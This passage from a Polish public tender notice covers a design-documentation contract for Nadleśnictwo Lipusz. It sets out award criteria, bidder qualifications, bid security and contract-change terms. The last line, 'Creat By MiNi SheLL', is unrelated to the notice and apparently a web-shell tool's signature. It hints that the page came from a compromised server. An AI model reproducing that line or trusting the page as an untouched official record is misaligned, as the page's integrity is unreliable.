najkorzystniejszą uznana zostanie Oferta Wykonawcy, która otrzyma najwyższą sumę punktów w wyżej wymienionych kryteriach oceny ofert. Oferta może uzyskać maksymalnie 100 punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie głównego projektanta</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Skrócenie terminu realizacji zadania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zdolność techniczna lub zawodowa<br/>O udzielenie zamówienia publicznego mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące zdolności technicznej lub zawodowej.<br/>a)	Zamawiający uzna, że Wykonawca spełnia warunki dotyczące zdolności technicznej lub zawodowej, jeżeli wykaże wykonanie nie wcześniej niż w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej 2 usług polegających na opracowaniu dokumentacji projektowej budowy lub przebudowy budynku użyteczności publicznej o kubaturze minimum 2000m3, obejmującej łącznie branże architektoniczną, konstrukcyjną, sanitarną, elektryczną i teletechniczną.<br/>Pojęcie budynku użyteczności publicznej należy rozumieć zgodnie z definicją zawartą w § 3 pkt 6 Rozporządzenia Ministra Infrastruktury z dnia 12 kwietnia 2022r. w sprawie warunków technicznych jakimi powinny odpowiadać budynki i ich usytuowanie (tj. Dz. U. z 2022r. poz. 1225).<br/>Pojęcie wykonania usługi na dokumentację projektową należy rozumieć jako sporządzenie projektu budowlanego i wykonawczego.<br/>b)	Dysponowanie osobami skierowanymi przez wykonawcę do realizacji zamówienia publicznego, posiadającymi uprawnienia budowlane do pełnienia samodzielnych funkcji technicznych w budownictwie zgodnie z przepisami ustawy z dnia 7 lipca 1994r. Prawo budowlane (Dz. U. 2025r., poz. 418) oraz przepisami Rozporządzenia Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie (Dz. U. 2019r. poz. 831) lub odpowiadającymi im ważnymi uprawnieniami budowlanymi wydanymi na podstawie uprzednio obowiązujących przepisów prawa w specjalności:<br/>- projektant w branży architektonicznej (Główny projektant - koordynator zespołu projektantów) - co najmniej jedna osoba posiadającą uprawnienia budowlane w specjalności architektonicznej do projektowania bez ograniczeń;<br/>- projektant w branży konstrukcyjno-budowlanej - co najmniej jedna osoba posiadającą uprawnienia budowlane w specjalności konstrukcyjno-budowlanej do projektowania bez ograniczeń;<br/>- projektant w branży instalacyjnej w zakresie sieci instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych - co najmniej jedna osoba posiadającą uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych do projektowania bez ograniczeń;<br/>- projektant w branży instalacyjnej w zakresie sieci instalacji i urządzeń elektrycznych i elektroenergetycznych - co najmniej jedna osoba posiadającą uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci instalacji i urządzeń elektrycznych i elektroenergetycznych do projektowania bez ograniczeń;<br/>- projektant w branży instalacyjnej w zakresie sieci instalacji i urządzeń telekomunikacyjnych - co najmniej jedna osoba posiadającą uprawnienia budowlane w specjalności instalacyjnej w zakresie telekomunikacji przewodowej wraz z infrastrukturą telekomunikacyjną oraz telekomunikacji bezprzewodowej wraz z infrastrukturą towarzyszącą do projektowania bez ograniczeń.<br/>Zamawiający dopuszcza możliwości łączenia funkcji w przypadku osób, o których mowa powyżej, które posiadają uprawnienia/ kwalifikacje w więcej niż jednej specjalności.<br/>Stosownie do art. 12 ust. 7 ustawy Prawo budowlane, podstawę do wykonywania samodzielnych funkcji technicznych w budownictwie stanowi m.in. wpis w drodze decyzji do centralnego rejestru, o którym mowa w art. 88a ust. 1 pkt 3 lit. a) ustawy Prawo budowlane - zgodnie z odrębnymi przepisami - wpis na listę członków właściwej izby samorządu zawodowego, potwierdzony zaświadczeniem wydanym przez tę izbę z określonym w nim terminem ważności. Zgodnie z art. 12a ustawy prawo budowlane samodzielne funkcje techniczne w budownictwie mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych. <br/>Wykonawca zobowiązany jest do zapewnienia stałej dyspozycyjności osób wchodzących w skład personelu wykonawcy (projektantów poszczególnych branż) w zakresie kontaktu telefonicznego oraz drogą elektroniczną (e-mail). Wykonawca zobowiązany będzie dostosować godziny pracy swoje i swojego personelu (projektantów) do godzin pracy Zamawiającego. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Oświadczenie wykonawcy w sprawie grupy kapitałowej – Załącznik nr 11 do SWZ<br/>2. Zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy Pzp, wystawione nie wcześniej niż 3 miesiące przed jego złożeniem. W przypadku zalegania z opłacaniem podatków lub opłat, wraz z zaświadczeniem, Zamawiający żąda złożenia przez Wykonawcę dokumentów potwierdzających, że odpowiednio przed upływem terminu składania ofert, Wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności.<br/>3. Zaświadczenie albo inny dokument właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1 ustawy Pzp, wystawione nie wcześniej niż 3 miesiące przed jego złożeniem. W przypadku zalegania z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym dokumentem Zamawiający żąda złożenia przez Wykonawcę dokumentów potwierdzających, że odpowiednio przed upływem terminu składania ofert Wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne lub zdrowotne wraz odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności.<br/>4. Oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu wstępnym – Załącznik nr 12 do SWZ<br/>Dokumenty Wykonawców mających siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej:<br/>1. Dokument potwierdzający niezaleganie z opłacaniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne<br/>Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast &#34;Zaświadczenia właściwego naczelnika urzędu skarbowego&#34; lub &#34;Zaświadczenia właściwej terenowej jednostki organizacyjnej ZUS lub KRUS&#34; składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające, że Wykonawca nie naruszył obowiązków dotyczących płatności podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne, wystawione nie wcześniej niż 3 miesiące przed ich złożeniem.<br/>2. Dokument potwierdzający, że nie otwarto likwidacji wykonawcy<br/>Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast &#34;Odpisu lub informacji z KRS lub CEIDG&#34; składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury, wystawione nie wcześniej niż 3 miesiące przed ich złożeniem.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Wykaz osób – Załącznik nr 9 do SWZ<br/>Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.<br/>Z załączonego wykazu ma wynikać, że wykonawca dysponuje lub będzie dysponować następującymi osobami posiadającymi uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie:<br/>- projektant w branży architektonicznej (Główny projektant - koordynator zespołu projektantów) - co najmniej jedna osoba posiadającą uprawnienia budowlane w specjalności architektonicznej do projektowania bez ograniczeń;<br/>- projektant w branży konstrukcyjno-budowlanej - co najmniej jedna osoba posiadającą uprawnienia budowlane w specjalności konstrukcyjno-budowlanej do projektowania bez ograniczeń;<br/>- projektant w branży instalacyjnej w zakresie sieci instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych - co najmniej jedna osoba posiadającą uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych do projektowania bez ograniczeń;<br/>- projektant w branży instalacyjnej w zakresie sieci instalacji i urządzeń elektrycznych i elektroenergetycznych - co najmniej jedna osoba posiadającą uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci instalacji i urządzeń elektrycznych i elektroenergetycznych do projektowania bez ograniczeń;<br/>- projektant w branży instalacyjnej w zakresie sieci instalacji i urządzeń telekomunikacyjnych - co najmniej jedna osoba posiadającą uprawnienia budowlane w specjalności instalacyjnej w zakresie telekomunikacji przewodowej wraz z infrastrukturą telekomunikacyjną oraz telekomunikacji bezprzewodowej wraz z infrastrukturą towarzyszącą do projektowania bez ograniczeń.<br/>Zamawiający dopuszcza możliwości łączenia funkcji w przypadku osób, o których mowa powyżej, które posiadają uprawnienia/ kwalifikacje w więcej niż jednej specjalności.<br/>2. Wykaz usług - Załącznik nr 10 do SWZ<br/>Wykaz dostaw lub usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających czy te dostawy lub usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy lub usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy. W przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy. Jeżeli Wykonawca powołuje się na doświadczenie w realizacji dostaw lub usług, wykonywanych wspólnie z innymi wykonawcami, wykaz dotyczy dostaw lub usług, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył, a w przypadku świadczeń powtarzających się lub ciągłych, w których wykonywaniu bezpośrednio uczestniczył lub uczestniczy.<br/>Z załączonego wykazu ma wynikać, że wykonawca wykonał co najmniej 2 usługi polegające na opracowaniu dokumentacji projektowej budowy lub przebudowy budynku użyteczności publicznej o kubaturze minimum 2000m3, obejmującej łącznie branże architektoniczną, konstrukcyjną, sanitarną, elektryczną i teletechniczną.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia przedmiotowych środków dowodowych. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Formularz oferty – Załącznik nr 6 do SWZ<br/>Dokument wypełniony przez Wykonawcę według wzoru załączonego do SWZ.<br/>2. Wykaz wykonanych usług w zakresie niezbędnym do oceny oferty w kryterium „Doświadczenie Głównego Projektanta” - Załącznik nr 6a do SWZ (opcjonalnie)<br/>Dokument wypełniony przez Wykonawcę według wzoru załączonego do SWZ.<br/>3. Zobowiązanie podmiotu udostępniającego zasoby – Załącznik nr 8 do SWZ (opcjonalnie)<br/>Zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca zobowiązany jest do wniesienia wadium w wysokości: 2 700.00 PLN (słownie: dwa tysiące siedemset 00/100 PLN).<br/>2. Wadium musi zostać wniesione przed upływem terminu składania ofert, tj. do dnia 2025-06-26 do godz. 09:00, według wyboru Wykonawcy w jednej lub kilku następujących formach:<br/>1)	pieniądzu;<br/>2)	gwarancjach bankowych;<br/>3)	gwarancjach ubezpieczeniowych;<br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. Dz.U. z 2025r. poz. 98).<br/>3. Wadium musi obejmować pełen okres związania ofertą tj. do dnia 2025-07-25.<br/>4. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego: BNP PARIBAS Bank Polska S. A. na nr rachunku: 09 1600 1462 1016 7739 8000 0003 (w tytule przelewu zaleca się wpisać nazwę i sygnaturę postępowania). Wadium musi wpłynąć na wskazany rachunek bankowy najpóźniej przed upływem terminu składania ofert (decyduje data wpływu na rachunek bankowy Zamawiającego).<br/>5. Wadium wnoszone w formie poręczeń lub gwarancji należy załączyć do oferty w oryginale w postaci dokumentu elektronicznego podpisanego kwalifikowanym podpisem elektronicznym przez wystawcę poręczenia lub gwarancji oraz powinno zawierać:<br/>1)	wskazanie Beneficjenta poręczenia lub gwarancji, którym musi być Skarb Państwa- Państwowe Gospodarstwo Leśne- Lasy Państwowe Nadleśnictwo Lipusz, ul. Brzozowa 2, 83-424 Lipusz;<br/>2)	nazwę i adres siedziby Wykonawcy;<br/>3)	kwotę i termin ważności gwarancji/poręczenia;<br/>4)	bezwarunkowe zobowiązanie wystawcy poręczenia lub gwarancji do zapłaty kwoty wadium, na pierwsze pisemne żądanie Zamawiającego, w sytuacjach określonych w art. 98 ust. 6 ustawy Pzp.<br/>6. Zamawiający zwróci wadium na zasadach określonych w art. 98 ust. 1-5 ustawy Pzp. <br/>7. W przypadku, gdy Wykonawca nie wniósł wadium lub wniósł w sposób nieprawidłowy lub nie utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub złożył wniosek o zwrot wadium, w przypadku o którym mowa w art. 98 ust. 2 pkt 3 ustawy Pzp, Zamawiający odrzuci ofertę Wykonawcy na podstawie art. 226 ust. 1 pkt 14 ustawy Pzp.<br/>8. Zamawiający zatrzyma wadium wraz z odsetkami, a w przypadku wadium wniesionego w formie gwarancji lub poręczenia, wystąpi odpowiednio do gwaranta lub poręczyciela z żądaniem zapłaty wadium, w przypadkach określonych w art. 98 ust. 6 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy zobowiązani są do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. W takim przypadku do oferty należy dołączyć pełnomocnictwo wystawione przez osoby upoważnione. Przez Wykonawców wspólnie ubiegających się rozumie się również spółki cywilne.<br/>2. Pełnomocnictwo należy dołączyć do oferty i powinno ono zawierać w szczególności wskazanie:<br/>1) postępowania o udzielenie zamówienie publicznego, którego dotyczy;<br/>2) wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia;<br/>3) ustanowionego pełnomocnika oraz zakresu jego umocowania.<br/>3. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, dokument ”Oświadczenia o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału”, składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>4. Jeżeli oferta wspólna złożona przez dwóch lub więcej Wykonawców zostanie wyłoniona w prowadzonym postępowaniu jako najkorzystniejsza, przed podpisaniem umowy w sprawie zamówienia publicznego, Zamawiający zażąda w wyznaczonym terminie złożenia umowy regulującej współpracę tych wykonawców, podpisanej przez wszystkich partnerów, przy czym termin na jaki została zawarta nie może być krótszy niż termin realizacji zamówienia oraz winna zawierać:<br/>1) strony umowy z oznaczeniem lidera;<br/>2) cel zawarcia umowy;<br/>3) okres obowiązywania umowy konsorcjum (obejmujący okres realizacji przedmiotu zamówienia, gwarancji, rękojmi);<br/>4) solidarną odpowiedzialność każdego z wykonawców wspólnie ubiegających się o udzielenie zamówienia za wykonanie umowy oraz wniesienie zabezpieczenia należytego wykonania umowy;<br/>5) wyłączenie możliwości wypowiedzenia umowy konsorcjum przez któregokolwiek z wykonawców wspólnie ubiegających się o udzielenie zamówienia do czasu wykonania przedmiotu zamówienia;<br/>6) zakaz dokonywania zmian w umowie konsorcjum bez zgody Zamawiającego.<br/>5. Przepisy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców, o których mowa w pkt 1. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zmiana umowy może nastąpić: <br/>1) w zakresie przedłużenia terminu zakończenia realizacji umowy o okres trwania przyczyn, z powodu których będzie zagrożone dotrzymanie terminu zakończenia umowy, w następujących sytuacjach: <br/>a) z powodu siły wyższej rozumianej jako zdarzenie nadzwyczajne, zewnętrzne, niemożliwe do przewidzenia i zapobieżenia, którego nie dało się uniknąć nawet przy zachowaniu najwyższej staranności, a które uniemożliwia Wykonawcy wykonanie jego zobowiązania w całości lub części. Do siły wyższej należy zaliczyć między innymi: pożar, powódź, huragan, eksplozję, awarie energetyczne, wojnę, operacje wojskowe, rozruchy, niepokoje społeczne, ograniczenia i zakazy wydane przez organy administracji publicznej, a także inne nadzwyczajne zjawiska losowe i przyrodnicze, atmosferyczne; <br/>b) gdy wystąpi opóźnienie w wydaniu w szczególności decyzji administracyjnych, aktów prawa miejscowego, zezwoleń, uzgodnień, itp. lub zaniechań lub opóźnień w publikacji aktów prawa miejscowego, do wydania lub publikacji których właściwe organy są zobowiązane na mocy przepisów prawa, jeśli opóźnienie przekroczy okres, przewidziany w przepisach prawa, w którym decyzje, zezwolenia, uzgodnienia, akty prawa miejscowego powinny zostać wydane lub opublikowane oraz nie są następstwem okoliczności, za które Wykonawca ponosi odpowiedzialność; <br/>c) wezwania przez organy administracji publicznej lub inne upoważnione podmioty do uzupełnienia przedmiotu umowy, jego poszczególnych części/opracowań projektowych; <br/>d) gdy wystąpi konieczność wystąpienia przez Wykonawcę z odpowiednimi wnioskami do poszczególnych dostawców mediów o wydanie aktualnych warunków technicznych przyłączenia obiektów do sieci sanitarnych, gazowych lub elektrycznych przy czym brak aktualnych uzgodnień spowodowany będzie przyczynami niezależnymi od Wykonawcy, a nadto Wykonawca wystąpił o ich wydanie niezwłocznie od chwili, gdy przy zachowaniu należytej staranności mógł dowiedzieć się o ich nieaktualności. W takiej sytuacji zmiana terminu możliwa będzie wyłącznie o czas trwania przeszkód uniemożliwiających realizację umowy lecz nie dłużej niż o 30 dni kalendarzowych. <br/>2. Zamawiający przewiduje dokonanie zmiany również w następujących sytuacjach: <br/>1) wprowadzenia zmiany zakresu projektowania przez Zamawiającego lub konieczności wykonania innych prac dodatkowych, w szczególności w przypadku konieczności dostosowania przedmiotu umowy do decyzji administracyjnych. W przypadku rezygnacji z realizacji części przedmiotu zamówienia wynagrodzenie przysługujące Wykonawcy zostanie odpowiednio pomniejszone, przy czym Zamawiający zapłaci za wszystkie wykonane prace. Pomniejszenie wynagrodzenia, o którym mowa wyżej nastąpi w oparciu o dane zawarte w ofercie Wykonawcy stanowiącej załącznik do niniejszej umowy. Niezależnie od powyższego Zamawiający ma prawo ustalić wysokość kwoty pomniejszonego wynagrodzenia w oparciu o opinię biegłego rzeczoznawcy, w szczególności w sytuacji, jeżeli pomniejszenie zakresu umowy nie będzie możliwe na podstawie wytycznych, o których mowa wyżej; <br/>2) zmiana polegająca na dopuszczeniu do wykonywania części zamówienia (zakresu prac) podwykonawcy, który nie został wskazany w ofercie po wcześniejszej akceptacji przez Zamawiającego; <br/>3) zmiana polegająca na dopuszczeniu do wykonywania przez podwykonawców tej części zamówienia (zakresu prac), która nie została wskazana w ofercie do podzlecenia po wcześniejszej akceptacji przez Zamawiającego ; <br/>4) zmiana osób przewidzianych do realizacji zamówienia i deklarowanych przez Wykonawcę w ofercie; <br/>5) zmiana albo rezygnacja z Podwykonawcy, na zasoby którego Wykonawca powoływał się na zasadach określonych w art. 118 Ustawy; <br/>6) konieczności zrealizowania przedmiotu umowy przy zastosowaniu innych rozwiązań <br/>3. Zmiany umowy mogą być dokonywane również w przypadku zaistnienia okoliczności wskazanych w art. 455 ust. 1 pkt 2-4 i ust. 2 ustawy Pzp.<br/><br/>Zakres kolejnych, przewidzianych zmian umowy wymieniono w sekcji IX pozostałe informacje. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-06-26 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi dokumentami należy umieścić na platformazakupowa.pl pod adresem: https://platformazakupowa.pl/transakcja/1119015</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-06-26 09:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-07-25</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zamawiający określa dodatkową podstawę wykluczenia Wykonawcy z postępowania:<br/>Zamawiający wykluczy z postępowania o udzielenie zamówienia Wykonawcę, wobec którego zachodzą podstawy wykluczenia określone w art. 7 ust 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. z 2025 poz. 514). Zamawiający oceni brak podstaw wykluczenia Wykonawcy z postępowania odnośnie powyższej przesłanki na podstawie złożonego przez Wykonawcę oświadczenia, o którym mowa w art.125 ust. 1 ustawy Pzp.<br/><br/>2. Dodatkowe informacje dotyczące zmian umowy: <br/>1. Zamawiający poprzez wydanie polecenia zmiany ma prawo jednostronnie zobowiązać Wykonawcę do dokonania następujących zmian w przedmiocie umowy: <br/>1) pominąć opracowanie części przedmiotu umowy (dokumentacji, opracowań projektowych, części), których wynagrodzenie stanowi nie więcej niż 20% wynagrodzenia brutto umowy; <br/>2) wykonać zamienne lub uzupełniające opracowania projektowe lub ich elementy; <br/>3) zmienić kolejności wykonania poszczególnych opracowań projektowych w ramach umowy; <br/>4) zmienić termin wykonania poszczególnych opracowań projektowych w ramach umowy. <br/>5. Przed wydaniem polecenia zmiany Zamawiający może zobowiązać Wykonawcę do przedłożenia w określonym terminie stanowiska w zakresie: <br/>1) technicznego uzasadnienia możliwości dokonania zmiany; <br/>2) opisu harmonogramu działań, czynności i opracowań niezbędnych do realizacji elementów przedmiotu umowy objętych poleceniem zmiany. <br/>6. Jeżeli prace projektowe związane z poleceniem zmiany, nie odpowiadają opisowi żadnej pozycji w ofercie Wykonawcy, Wykonawca powinien przedłożyć do Zamawiającego kalkulację indywidualną wykonaną w oparciu o Środowiskowe Zasady Wyceny Prac Projektowych i uwzględniającą stawkę za jednostkę nakładu pracy obowiązującą w dniu wydania polecenia zmiany. <br/>7. Jeżeli w opinii Wykonawcy, polecenie Zamawiającego wykracza poza zakres uprawnień wynikający z umowy, Wykonawca w terminie zawitym 5 dni kalendarzowych od daty otrzymania takiego polecenia, jest zobowiązany powiadomić pisemnie wraz z uzasadnieniem o tym fakcie Zamawiającego. Zamawiający w terminie 5 dni kalendarzowych od otrzymania powiadomienia Wykonawcy zajmie stanowisko w sprawie. Brak stanowiska Zamawiającego w ww. terminie oznacza potwierdzenie wydanego wcześniej polecenia. <br/>8. Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody i nie rodzą żadnej ze Stron umowy roszczenia o zawarcie aneksu (obie Strony muszą wyrazić zgodę na zawarcie aneksu). <br/>9. W razie wątpliwości, przyjmuje się, że nie stanowią zmiany umowy następujące zmiany: <br/>1) danych związanych z obsługą administracyjno-organizacyjną umowy; <br/>2) danych teleadresowych; <br/>3) danych rejestrowych, <br/>będące następstwem sukcesji uniwersalnej po jednej ze stron umowy. <br/>10. Zamawiający zastrzega, że jeśli w wyniku wprowadzenia zmian do umowy, dojdzie do ograniczenia zakresu zamówienia przez Zamawiającego, minimalna wartość świadczenia stron wynosi 80% wartości Zamówienia. <br/><br/>3. Zamawiający wskazuje, że zamówienie musi zostać zrealizowane w terminie: <br/>Termin realizacji zamówienia został podzielony na etapy:<br/>Etap I – do 45 dni kalendarzowych od dnia podpisania umowy,<br/>Etap II – do 120 dni kalendarzowych od dnia podpisania umowy;<br/>Etap III - od dnia rozpoczęcia robót budowlanych realizowanych na podstawie dokumentacji projektowej będącej przedmiotem niniejszej umowy i trwał będzie nieprzerwanie do czynności odbioru końcowego (przewidywana data zakończenia robót budowlanych wykonywanych na podstawie dokumentacji będącej przedmiotem niniejszej umowy to 31.12.2027 roku).

Creat By MiNi SheLL
